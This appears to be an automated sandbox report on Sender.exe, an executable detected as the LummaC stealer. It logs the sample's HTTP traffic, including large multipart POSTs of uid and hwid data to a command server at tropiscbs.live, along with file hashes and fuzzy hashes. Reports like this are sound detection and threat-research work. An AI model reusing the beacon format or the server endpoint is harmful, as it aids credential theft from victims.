                                                                      2025-04-27 16:36:40 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 22 7d 7d 0d 0a
                                                                      Data Ascii: 46{"success":{"message":"message success delivery from 173.244.56.186"}}
                                                                      2025-04-27 16:36:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.449718104.21.77.2034434768C:\Users\user\Desktop\Sender.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-04-27 16:36:41 UTC277OUTPOST /iuwxx HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=G439QGWWjdM6
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                      Content-Length: 551525
                                                                      Host: tropiscbs.live
                                                                      2025-04-27 16:36:41 UTC15331OUTData Raw: 2d 2d 47 34 33 39 51 47 57 57 6a 64 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 31 32 64 38 39 38 37 34 30 63 31 31 34 36 34 39 32 30 31 62 66 32 66 31 66 31 37 66 39 36 66 30 0d 0a 2d 2d 47 34 33 39 51 47 57 57 6a 64 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 34 33 39 51 47 57 57 6a 64 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 44 39 30 44 34 38 38 37 44 44 46 35 35 45 36 42 38 35 39 30 46 43 33 43 45 46 30 33 46
                                                                      Data Ascii: --G439QGWWjdM6Content-Disposition: form-data; name="uid"12d898740c114649201bf2f1f17f96f0--G439QGWWjdM6Content-Disposition: form-data; name="pid"1--G439QGWWjdM6Content-Disposition: form-data; name="hwid"0BD90D4887DDF55E6B8590FC3CEF03F
                                                                      2025-04-27 16:36:41 UTC15331OUTData Raw: 85 de 3c 71 be dc ff 34 9e b0 b0 1a e1 d4 da 6b 18 12 5b a1 04 3b 2d f3 43 cd 39 cd 39 0d 2e 6d 83 78 94 d2 9e 9d f2 b3 24 d5 68 aa fe f9 85 03 09 cb 89 52 bb 76 5e 37 a3 30 7a 78 55 6e 61 a0 83 55 0d 39 26 7e 2b e8 52 8d 04 80 27 c0 d3 75 99 08 21 aa d3 6b a2 41 8b 93 e2 4b d9 d6 bf 99 c3 ff 6b dd 8d 53 fb 74 10 f2 07 d9 25 37 24 05 eb 42 6d 32 41 a6 01 da ec 18 c6 fe c6 58 b8 8e c5 2d e2 bc b3 bc 3d 2e eb 04 92 57 b0 85 c9 ad cb 70 42 85 89 33 33 fd 4d 29 e7 33 61 f0 a3 15 32 a4 1e 61 d3 4c a4 6c b8 55 6e 09 1f d6 fe af 49 cc 14 7c 41 f8 83 b0 9e 76 1f da e2 b5 45 68 00 4e 59 6e 90 31 bd 5b 52 28 80 60 f4 c1 aa 5e 93 e0 5d 24 04 87 25 15 72 a5 81 3d 13 25 43 57 04 51 96 b4 3c a8 a5 61 29 76 83 fe 48 28 c1 00 9e 9d f0 0b 8a 8f d1 b2 cd fa 07 3c 8d b2 7c
                                                                      Data Ascii: <q4k[;-C99.mx$hRv^70zxUnaU9&~+R'u!kAKkSt%7$Bm2AX-=.WpB33M)3a2aLlUnI|AvEhNYn1[R(`^]$%r=%CWQ<a)vH(<|
                                                                      2025-04-27 16:36:41 UTC15331OUTData Raw: b1 4b 44 c5 ab c1 a4 b6 67 37 db 09 15 77 61 13 77 3a e2 d3 1c bf e8 42 65 bb 49 c5 c4 11 10 2a 6d 26 45 a7 bb c2 a1 66 bb ab 28 bd d2 f1 9a ef 43 c8 9b ee 20 f5 ce 17 39 b0 78 66 c8 e2 b4 27 16 31 51 0e 13 d3 b2 60 ba 3c f7 ab af 4a 45 75 e6 08 e0 0a c2 25 38 50 80 ee f3 af 0b 64 a9 2c 20 73 dc 9f 63 ae 50 38 14 10 0d 3a 15 34 00 0a 68 ce 44 0c 89 bb af 5d 20 9a de 59 aa db 51 58 0c 7d 31 da 09 4d 7f 9c 59 f4 a5 c1 67 2c d3 c1 59 43 0e d5 c7 97 30 e0 76 15 ee 42 d5 7a e3 8c f0 0d 84 b6 25 21 4a 25 f7 32 de c3 fd 83 37 b5 b0 b0 e5 57 86 e9 09 9b 40 dd f4 00 4e 8f 25 62 9c 99 77 c4 8e ee 8c dd d4 15 e0 b7 a1 23 c7 0d 97 49 15 75 98 37 70 9f 8c a1 57 de 4c 9e 38 5d 6f 1c 10 df 47 73 ae b7 43 5e 50 c1 ff 1f ef ec f5 52 7f 8c d2 e0 18 6c da e0 a4 6e bc 8e bd
                                                                      Data Ascii: KDg7waw:BeI*m&Ef(C 9xf'1Q`<JEu%8Pd, scP8:4hD] YQX}1MYg,YC0vBz%!J%27W@N%bw#Iu7pWL8]oGsC^PRln
                                                                      2025-04-27 16:36:41 UTC15331OUTData Raw: 68 3b bf 0d e5 82 a8 c4 e9 81 b9 6b d2 64 69 e5 cc 98 8e 0c 2f 80 2b 86 bb b1 39 a6 30 21 48 6a 56 b3 5d 20 ba db 41 bf 99 33 f0 27 98 cd c2 2e fd 07 68 c0 df 59 e4 c1 25 43 e8 20 1f c2 7e 7c 43 4a eb b7 38 45 ac a2 a7 78 c1 32 62 66 11 88 82 13 30 f4 17 c2 f0 30 b3 03 fb b7 df 0c 3c 4f 9b b4 d9 33 3d 35 71 5c d6 41 18 66 bd e0 fc 4a 07 61 1d 2a 0d 9c 49 06 82 36 67 d6 1d 6f 33 57 ec 17 5b 1f bb ff 60 54 0f 49 4f f6 10 a8 87 f4 13 06 a8 2a b9 64 31 63 44 19 05 4a 77 6b 65 e4 57 c1 1b 16 e8 7e 03 7e 02 6b 65 fd 39 75 b0 c7 74 08 72 90 0e 0c bc 6b d8 20 5d ec 63 0c 06 f9 aa 97 9e 36 4b 7a ad 51 30 53 d7 f8 17 3a e3 4b 55 da de 7f ac e1 47 34 47 b8 12 cb 92 50 ae 9e db 32 ad 64 1a 8f f4 a7 12 49 3c 16 8f 89 58 82 ec 56 91 f1 ab 04 e1 c1 5d 97 0a a4 4f cb a0
                                                                      Data Ascii: h;kdi/+90!HjV] A3'.hY%C ~|CJ8Ex2bf00<O3=5q\AfJa*I6go3W[`TIO*d1cDJwkeW~~ke9utrk ]c6KzQ0S:KUG4GP2dI<XV]O
                                                                      2025-04-27 16:36:41 UTC15331OUTData Raw: b3 e9 68 35 dd 79 73 3e fe 73 15 c9 44 12 8a c6 f7 59 91 7c 6d 11 96 c9 46 5b 2d 2f f5 06 1c 46 58 93 3f 89 e5 40 02 1a fc 14 03 6d 62 d7 40 6a 4e 4b 9e 78 dc 64 19 e9 49 b2 da d1 26 cf 4e 11 07 ac 1f 1a 9f 50 0a 19 62 79 dd ba 2f 09 cc 1c 69 09 2d d8 10 8b 77 ee 6a 19 fc e0 bd 20 1a 21 65 e1 d8 13 68 48 0b 6f 6e ed d2 05 9a ab f4 f4 f4 23 3e 4d b1 9c 2d b7 9e c2 85 10 e2 20 ae 39 17 9d 1e 70 a1 c7 3f 92 22 46 c9 42 f8 d7 01 c3 5e 08 67 47 ee 4a 83 f9 6d cb 99 76 e6 c6 d0 bf 97 43 e1 00 22 0e 70 58 e3 b4 70 7a ec 41 40 18 9e 0e 8d 9a a2 60 15 bf 16 f2 af 27 2f 39 95 e2 85 ce 0d c1 f5 41 ae 46 41 62 5f 97 b6 60 38 11 87 3f 2c f1 5c 68 bc a8 7f 23 62 be b6 23 71 cf 6f e1 b7 d1 1f 5f bf 2d 99 a9 f2 ca 9d f4 1b 0a 5d c5 5d 69 0f ed 55 14 de d3 72 b8 7a 59 1f
                                                                      Data Ascii: h5ys>sDY|mF[-/FX?@mb@jNKxdI&NPby/i-wj !ehHon#>M- 9p?"FB^gGJmvC"pXpzA@`'/9AFAb_`8?,\h#b#qo_-]]iUrzY
                                                                      2025-04-27 16:36:41 UTC15331OUTData Raw: 6f 2d f6 56 b5 9c 8f 21 83 08 45 e8 d0 3c ba 37 89 1f 4b a3 9a 7a 0e 37 f1 f8 ed 8e 4a ba 29 74 4f 89 f6 51 66 55 93 ee 8f e4 b4 ef 23 ca 01 9c 74 42 37 b2 4d 79 fc ac b0 af ca 41 b3 b5 84 77 fd 12 1e 30 15 12 ea 8c e4 b4 04 09 4f b2 4b f6 e4 56 9d 0b a7 ac 19 79 4e 4d 29 1e 48 37 93 00 ae fb 14 38 a4 9e bb 6d 52 5d 0a 82 2c 71 0b 42 b2 07 0a f6 ca 4a 31 9b 3e 3f f6 8f 2d 78 64 a9 c3 e9 1e 65 d4 05 6c c0 4b 6e c2 ad 47 0a 59 e6 2d 0a 3f 68 da 3d d4 0c 90 2f fe b9 1d ed fc 83 bc 67 d8 fb 0c 7b 0a b0 3f 5d ad d5 cb 33 58 f8 80 ca a2 11 55 99 b5 59 82 7d 2a 6b 08 f5 21 54 2a d1 06 f7 b7 02 ef c8 c0 de e3 9c 1b cc 8c be 9c 78 42 1c 4f e5 e1 59 45 54 af 9b a1 4f 9c 11 1c 65 28 83 1e 2d 00 41 6b 4c fe 8a 5e 2a 23 9f 65 1a 3d 5e 14 29 06 b6 3f 14 d8 e0 47 e0 57
                                                                      Data Ascii: o-V!E<7Kz7J)tOQfU#tB7MyAw0OKVyNM)H78mR],qBJ1>?-xdelKnGY-?h=/g{?]3XUY}*k!T*xBOYETOe(-AkL^*#e=^)?GW
                                                                      2025-04-27 16:36:41 UTC15331OUTData Raw: 86 8b da 90 13 32 ed 16 03 be 3a 74 7f f4 0f 0e c1 20 08 b8 63 3b 99 7f 9e 1a f4 f7 03 80 ae 7d f2 0c d2 48 a9 20 f7 b7 a8 2d 31 c5 a3 56 46 04 fc 8f 25 31 0a a0 64 f2 51 83 c0 10 03 2e e1 f4 00 44 44 e8 6e 70 0b 55 ae 5f 24 3d 0a 59 e2 a7 68 da 57 83 14 d6 68 dc aa 99 db ec 06 72 98 e6 52 92 e0 09 68 8c 7a 22 3f ae 4c c2 02 89 07 6a 92 0f 6a dc 99 6f 51 06 55 7e f9 c1 21 d7 bf de ee 73 99 fa 30 c7 92 8c 0b 0e 31 1e 24 58 9b 93 cf 9b 5a a2 79 ab a6 4e 1a 37 67 0a 3b 0a ef db 3f 2f 45 e4 f7 11 3f 16 71 ec 03 bc 2f 48 55 09 3a 8d 00 fd 2d d2 a1 a5 5e c2 d3 80 9e 71 c0 94 8e 81 bb be 0b 26 cf 4a 40 c0 b1 2f fb 10 c5 8f c2 b5 a9 b1 a1 97 b1 08 dc 6a c2 1c 99 07 c9 33 00 7c 92 62 61 da d5 d2 59 76 1c 36 ff 39 89 52 01 f2 0c b7 56 95 86 bf 90 7b ef 38 15 9c bf
                                                                      Data Ascii: 2:t c;}H -1VF%1dQ.DDnpU_$=YhWhrRhz"?LjjoQU~!s01$XZyN7g;?/E?q/HU:-^q&J@/j3|baYv69RV{8
                                                                      2025-04-27 16:36:41 UTC15331OUTData Raw: e6 4c b7 48 98 0c 3b 93 04 2d 2e 0d 22 f8 07 b0 bc b0 0e e5 67 bc 3c 2b 30 1f 11 e4 47 64 6e f5 f7 d3 a4 1a 64 49 3d 34 24 1d 64 23 24 8f 88 4b 93 50 5b b9 12 2a 31 52 e7 e2 22 18 af 41 49 af 36 a3 69 b4 e5 77 fc 6c ba b8 77 2c 42 7c ac 05 02 46 d8 64 a2 25 95 01 8c 8f 6b fb 5d 4e 69 c7 30 c6 83 59 d2 7d 9d 48 7f 84 f7 9a 68 ee 3d 5c 71 e8 19 79 e7 d4 7c d1 87 66 50 28 53 f6 47 3e 6f 60 d0 86 be aa 9f 75 62 8e fe 1e 14 8f 97 4f ba 94 95 24 87 ba b5 92 28 b4 59 90 01 7f be a0 58 be 41 f5 bf 36 16 7b 33 64 4d 2b 41 dc 9a 70 71 65 28 f3 ae 74 0f 7b 45 c9 a8 d3 15 c5 19 22 30 05 ce 05 10 6f 58 59 8e 07 9d eb 61 ef aa a4 93 bc 4f 06 77 43 21 ec 3f 21 8e d4 13 54 f5 42 80 29 d7 2d 1d 3a ce 1c a4 68 38 ab 12 93 79 aa 86 51 45 b4 14 71 43 51 08 93 be 8f 41 07 e9
                                                                      Data Ascii: LH;-."g<+0GdndI=4$d#$KP[*1R"AI6iwlw,B|Fd%k]Ni0Y}Hh=\qy|fP(SG>o`ubO$(YXA6{3dM+Apqe(t{E"0oXYaOwC!?!TB)-:h8yQEqCQA
                                                                      2025-04-27 16:36:41 UTC15331OUTData Raw: 0f ff 72 c9 9b c3 2b 11 6d fe 78 5f 25 77 26 44 5e b2 90 5b b3 2b 33 dd 9c 72 de 66 bf 08 e4 42 51 5e e4 67 38 2e 10 89 00 78 f3 41 16 47 ac dd 20 8f 78 ed ae f6 2d 16 61 82 ed 75 8a dc de 50 62 d9 bb 76 02 63 9f 84 59 31 de 38 ca 7c 80 f1 17 2e e7 db 1c 33 0b d0 b3 6e 5d b4 47 69 4c 86 c7 51 83 10 a7 58 4f a5 0e 68 ad 5a 8f ea 47 97 6c e7 30 38 08 29 ef 05 88 52 48 2b 78 0f 85 a7 3c 86 e5 96 51 02 ba fe 6c 3d e1 8e 0e 7c a5 d3 d4 00 a2 46 32 df 42 03 1d 32 69 47 d3 6b 67 a2 70 75 08 f7 e0 1a 99 68 63 2a e2 95 42 90 c0 f0 52 02 b2 64 96 de 07 65 dc 32 cd b4 b2 a9 33 b7 1b 69 f0 39 aa 24 eb 44 c4 80 60 1f 5e e3 3e b1 f0 e3 c2 7f 35 c4 fb 4d d4 2d c7 4f fa d1 03 2b 88 8b 71 0c 2c aa 49 c8 a6 c0 f6 14 54 27 9f aa 01 03 a4 38 c5 c0 bf 5b 6b 9e cf d4 2a a9 19
                                                                      Data Ascii: r+mx_%w&D^[+3rfBQ^g8.xAG x-auPbvcY18|.3n]GiLQXOhZGl08)RH+x<Ql=|F2B2iGkgpuhc*BRde23i9$D`^>5M-O+q,IT'8[k*
                                                                      2025-04-27 16:36:41 UTC15331OUTData Raw: b8 b9 98 44 1a 60 63 a4 1e fe a5 1f 0d f4 cd 3c da f5 c7 a1 b7 d6 54 7a da 95 7f 2d 1c f0 39 c3 6e d6 0b 84 fb 8c 56 f8 9b 22 52 c9 77 99 8a cf 6d de 21 4c ea b6 d1 2b d9 3c 5b da 68 cd 9c e6 a1 7a d5 7e f2 07 ec 99 c5 d6 6b 48 45 f9 04 c2 94 34 1d f8 b2 f5 82 a7 bd ac 2b 08 11 b3 ac e2 2a f1 fc a2 4a 86 65 e0 d4 d6 8c ac 4c 65 3a d3 68 52 f6 7c c4 45 e7 e5 b5 c6 6b e2 27 21 b7 e8 32 59 6e bb 6b 3a e1 ea d4 12 02 68 2b e3 0f 53 2b 04 b0 7c 07 75 56 45 48 47 bf 46 c7 ad 58 70 71 a0 a3 44 78 bc 43 26 52 87 f5 3a 06 49 1f d4 c1 9c 23 c7 ba fe aa d0 6e 10 10 3d de a5 18 37 31 69 13 20 5a 24 b7 61 de f8 04 a7 cd 08 53 7c eb 7b c2 a4 65 14 ab b0 de 2a ff 7e 96 91 a8 9c 76 46 2c 18 81 09 44 86 e1 86 28 9f ed 29 9a 81 bb b9 ce 2e 48 04 5a 01 c9 09 65 85 63 7d 62
                                                                      Data Ascii: D`c<Tz-9nV"Rwm!L+<[hz~kHE4+*JeLe:hR|Ek'!2Ynk:h+S+|uVEHGFXpqDxC&R:I#n=71i Z$aS|{e*~vF,D().HZec}b
                                                                      2025-04-27 16:36:44 UTC264INHTTP/1.1 200 OK
                                                                      Date: Sun, 27 Apr 2025 16:36:44 GMT
                                                                      Content-Type: application/json
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      Vary: Accept-Encoding
                                                                      Cf-Cache-Status: DYNAMIC
                                                                      CF-RAY: 936fbd80d8eb5233-LAX
                                                                      alt-svc: h3=":443"; ma=86400


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.449721104.21.77.2034434768C:\Users\user\Desktop\Sender.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-04-27 16:36:44 UTC264OUTPOST /iuwxx HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                      Content-Length: 79
                                                                      Host: tropiscbs.live
                                                                      2025-04-27 16:36:44 UTC79OUTData Raw: 75 69 64 3d 31 32 64 38 39 38 37 34 30 63 31 31 34 36 34 39 32 30 31 62 66 32 66 31 66 31 37 66 39 36 66 30 26 63 69 64 3d 26 68 77 69 64 3d 30 42 44 39 30 44 34 38 38 37 44 44 46 35 35 45 36 42 38 35 39 30 46 43 33 43 45 46 30 33 46 37
                                                                      Data Ascii: uid=12d898740c114649201bf2f1f17f96f0&cid=&hwid=0BD90D4887DDF55E6B8590FC3CEF03F7
                                                                      2025-04-27 16:36:45 UTC241INHTTP/1.1 200 OK
                                                                      Date: Sun, 27 Apr 2025 16:36:45 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 43
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      Cf-Cache-Status: DYNAMIC
                                                                      CF-RAY: 936fbd951ba0f20a-LAX
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-04-27 16:36:45 UTC43INData Raw: ba fa 20 8d ed e9 b5 a2 c8 39 fb 76 65 65 9b b3 7e f7 91 7c 9f 38 a4 35 4c b5 61 13 fa 40 af 93 71 3a ff cf 78 82 22 1e 6c bd 66
                                                                      Data Ascii: 9vee~|85La@q:x"lf


                                                                      Statistics

                                                                      CPU Usage

                                                                      050100s020406080100

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      050100s0.005101520MB

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      • File
                                                                      • Registry

                                                                      Click to dive into process behavior distribution

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:12:36:30
                                                                      Start date:27/04/2025
                                                                      Path:C:\Users\user\Desktop\Sender.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Sender.exe"
                                                                      Imagebase:0xa00000
                                                                      File size:169'472 bytes
                                                                      MD5 hash:39E94524E19C217D1F19208A42A12947
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true
                                                                      Show Windows behavior

                                                                      File Activities

                                                                      Show Windows behavior

                                                                      Section Activities

                                                                      Show Windows behavior

                                                                      Registry Activities

                                                                      Show Windows behavior

                                                                      COM Activities

                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      Show Windows behavior

                                                                      Process Activities

                                                                      Show Windows behavior

                                                                      Thread Activities

                                                                      Show Windows behavior

                                                                      Memory Activities

                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                      Disassembly

                                                                      Non-executed Functions

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000003.1278664144.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Offset: 006E7000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_3_6e7000_Sender.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: f
                                                                      • API String ID: 0-1993550816
                                                                      • Opcode ID: f1d87a2891968507f6f54c2c8887fe7d1cb44da55dfb688157f916d044aa1fba
                                                                      • Instruction ID: 10033a942e97220c9aea79f651d9428e4ad5a8e98ddf67a4f478134249277219
                                                                      • Opcode Fuzzy Hash: f1d87a2891968507f6f54c2c8887fe7d1cb44da55dfb688157f916d044aa1fba
                                                                      • Instruction Fuzzy Hash: 3471BF2640E3C19FC7138F30D966692BFB2AF07314B1A85CED4C18B5A7C369690AD762
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000003.1231928115.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, Offset: 006C7000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_3_6c7000_Sender.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: l
                                                                      • API String ID: 0-2517025534
                                                                      • Opcode ID: f4e2a374e378c871f2cbb428243542505db6a4204eef6f162498f259c897ee16
                                                                      • Instruction ID: 62dd0988643dc2b9e3a9c33ea479173a5a62526d55b1c461376cfeee2750fc35
                                                                      • Opcode Fuzzy Hash: f4e2a374e378c871f2cbb428243542505db6a4204eef6f162498f259c897ee16
                                                                      • Instruction Fuzzy Hash: 6C222FA640E7C04FD74387B49CAA7917FB1AF17104B0E86EBC4C4CF5A3D619681AE762
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000003.1231928115.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, Offset: 006C7000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_3_6c7000_Sender.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a223ff0e41d9bb7b8c83598273b241f90b61099ff8ba03b314430f8af0a29e0a
                                                                      • Instruction ID: 456d3aa8c0aceb4ad59ce66fdf8b7c00ec875d3e31abaa1456d52ca19ee815fc
                                                                      • Opcode Fuzzy Hash: a223ff0e41d9bb7b8c83598273b241f90b61099ff8ba03b314430f8af0a29e0a
                                                                      • Instruction Fuzzy Hash: 96C1309644E7C04FD30387B49C667917FB1AF27205B0E86EBC4C5CF5A3E619681AE722
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000003.1231928115.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, Offset: 006C7000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_3_6c7000_Sender.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9bba165ce8443d05ad325b825f7a5a2ad79f5f1dada144152ce4074dfbdc0510
                                                                      • Instruction ID: 988d8aee44ef83f0c227e2ad85497d1b8224b96431ed6ca1b4a32866f0752b8d
                                                                      • Opcode Fuzzy Hash: 9bba165ce8443d05ad325b825f7a5a2ad79f5f1dada144152ce4074dfbdc0510
                                                                      • Instruction Fuzzy Hash: E7B130A684EBC44FD31387749C66A617FB1AF63208B0E85DBC4C0CF5E3E259580AD762
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Offset: 006C7000, based on PE: false
                                                                      • Associated: 00000000.00000003.1231928115.00000000006C7000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_3_6c7000_Sender.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d56581a7c0867e71e2b3de01a2758c3711edc398a198fe232008a3126cfad63f
                                                                      • Instruction ID: c2414860b8a056e5a6302edde12ff28e35b3af9e252c619b4dad89dfd4dff1c1
                                                                      • Opcode Fuzzy Hash: d56581a7c0867e71e2b3de01a2758c3711edc398a198fe232008a3126cfad63f
                                                                      • Instruction Fuzzy Hash: BF51E22240A3D49FC7178F70D921682BFB1AF47310B2E45CFD4C19F663D2A5A90AC792
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000003.1278664144.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Offset: 006E7000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_3_6e7000_Sender.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b3474120f3a6ade64f153a527afc7b4ab2da54460bda431084f8911e8948d15a
                                                                      • Instruction ID: e876eb3bba8052be7c667860a59a41b21e8ee4c405dd8c4cbfaa1d8dc72bef0a
                                                                      • Opcode Fuzzy Hash: b3474120f3a6ade64f153a527afc7b4ab2da54460bda431084f8911e8948d15a
                                                                      • Instruction Fuzzy Hash: C841F33600A3D49BCB26CF71C552683BFB6BF07310B2985CDD4C15B663C265A906CB91